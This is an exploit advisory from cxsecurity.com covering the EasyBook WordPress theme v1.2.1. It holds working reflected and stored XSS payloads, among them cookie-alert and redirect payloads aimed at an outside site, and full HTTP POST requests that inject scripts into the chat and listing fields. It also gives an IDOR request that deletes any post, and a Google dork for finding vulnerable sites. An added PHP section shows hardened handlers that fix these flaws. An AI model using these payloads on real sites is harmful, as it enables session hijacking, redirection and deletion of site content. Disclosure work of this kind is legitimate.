EasyBook – Directory & Listing WordPress Theme v1.2.1 Multiple Vulnerabilities

2019.12.27
Author: m0ze (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: EasyBook – Directory & Listing WordPress Theme v1.2.1 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/easybook/
# Date: 27/12/2019
# Exploit Author: m0ze
# Vendor Homepage: https://cththemes.com/
# Software Link: https://themeforest.net/item/easybook-directory-listing-wordpress-theme/23206622
# Version: 1.2.1
# Tested on: Parrot OS
# CWE: 79

----[]- Reflected XSS: -[]----

The input field with placeholder «Hotel , City...» on the homepage is vulnerable, as is the regular search block under the «Add Listing» button.

Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0
PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0

----[]- Persistent XSS -> Chat: -[]----

Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website, from https://www.easybook.cththemes.org/dashboard/#/chats or from the chat widget in the bottom-right corner.

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_

Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID; in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload).

----[]- Persistent XSS -> Listing page: -[]----

Add a new listing at https://www.easybook.cththemes.org/dashboard/#/addListing (the first time, you need to order a «Free» plan and then open this URL again). Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------970149683563
Content-Length: 4142
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

-----------------------------970149683563
Content-Disposition: form-data; name="lid"

0
-----------------------------970149683563
Content-Disposition: form-data; name="listing_type_id"

5058
-----------------------------970149683563
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="locations"

US|M
-----------------------------970149683563
Content-Disposition: form-data; name="title"

PoC
-----------------------------970149683563
Content-Disposition: form-data; name="address"

"><img src=x onerror=alert(1)>
-----------------------------970149683563
Content-Disposition: form-data; name="longitude"

"><img src=x onerror=alert(2)>
-----------------------------970149683563
Content-Disposition: form-data; name="latitude"

"><img src=x onerror=alert(3)>
-----------------------------970149683563
Content-Disposition: form-data; name="author_email"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_phone"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_website"

M
-----------------------------970149683563
Content-Disposition: form-data; name="content"

"><img src=x onerror=alert(document.domain)>
-----------------------------970149683563
Content-Disposition: form-data; name="features[0]"

303
-----------------------------970149683563
Content-Disposition: form-data; name="features[1]"

300
-----------------------------970149683563
Content-Disposition: form-data; name="features[2]"

305
-----------------------------970149683563
Content-Disposition: form-data; name="features[3]"

302
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][title]"

"><img src=x onerror=alert(9)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][number]"

"><img src=x onerror=alert(10)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][icon]"

123
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_id]"

-imgsrcxonerroralert12
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_name]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_desc]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_price]"

0
-----------------------------970149683563
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------970149683563
Content-Disposition: form-data; name="_wpnonce"

1c8cd14288
-----------------------------970149683563--

----[]- IDOR: -[]----

Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX

Where:
lid=XXXX (the page/post/listing's unique WordPress ID, which can be discovered from the page class on the <body> tag).
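How the three issue classes above (reflected XSS in `search_term`, stored XSS through `easybook_addons_chat_reply`, and the unauthorized delete through `easybook_addons_delete_listing`) are closed on the server side, as an added illustration written for this page and not the theme's own code. The nonce action strings, the `listing` post type slug and `easybook_store_chat_message()` are assumptions; everything else is standard WordPress API.

```php
<?php
// Added, hypothetical hardened versions of the two admin-ajax handlers named in
// the advisory. Not the theme's own code; nonce action strings, the 'listing'
// post type and easybook_store_chat_message() are assumptions.

// IDOR: object-level authorization before deleting anything by `lid`.
function hardened_easybook_delete_listing() {
    check_ajax_referer( 'easybook_delete_listing', '_nonce' ); // assumed action name
    $lid  = absint( $_POST['lid'] ?? 0 );
    $post = $lid ? get_post( $lid ) : null;
    // Only the theme's listing post type may be reached via this endpoint,
    // so unrelated posts and pages cannot be deleted through it.
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( 'not found', 404 );
    }
    // The capability is checked against this specific post (meta capability),
    // so a logged-in user cannot delete another user's listing.
    if ( ! current_user_can( 'delete_post', $post->ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_delete_post( $post->ID, true );
    wp_send_json_success( array( 'deleted' => $post->ID ) );
}
add_action( 'wp_ajax_easybook_addons_delete_listing', 'hardened_easybook_delete_listing' );

// Stored XSS in chat: sanitize on input, escape on output, and never trust a
// client-supplied sender id (the advisory's `user_id` parameter).
function hardened_easybook_chat_reply() {
    check_ajax_referer( 'easybook_chat_reply', '_nonce' ); // assumed action name
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $from  = get_current_user_id();
    $touid = absint( $_POST['touid'] ?? 0 );
    // sanitize_text_field() strips tags, so `<img src=x onerror=...>` never reaches storage.
    $text  = sanitize_text_field( wp_unslash( $_POST['reply_text'] ?? '' ) );
    easybook_store_chat_message( $from, $touid, $text ); // assumed storage helper
    // Escape again at the output boundary; the client inserts this as HTML.
    wp_send_json_success( array( 'html' => esc_html( $text ) ) );
}
add_action( 'wp_ajax_easybook_addons_chat_reply', 'hardened_easybook_chat_reply' );

// Reflected XSS: assuming the term is echoed into the search input's value
// attribute, esc_attr() makes both a bare <img> tag and a `">` breakout inert.
function hardened_easybook_search_input() {
    $term = sanitize_text_field( wp_unslash( $_GET['search_term'] ?? '' ) );
    return '<input type="text" name="search_term" value="' . esc_attr( $term ) . '">';
}
```

The same input-sanitize / output-escape pair applies to the listing fields («Address», «Longitude», «Latitude», «Fact Title», «Fact Number») handled by `submit_listing`; a numeric field such as longitude should additionally be validated as a float before storage.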

Copyright 2020, cxsecurity.com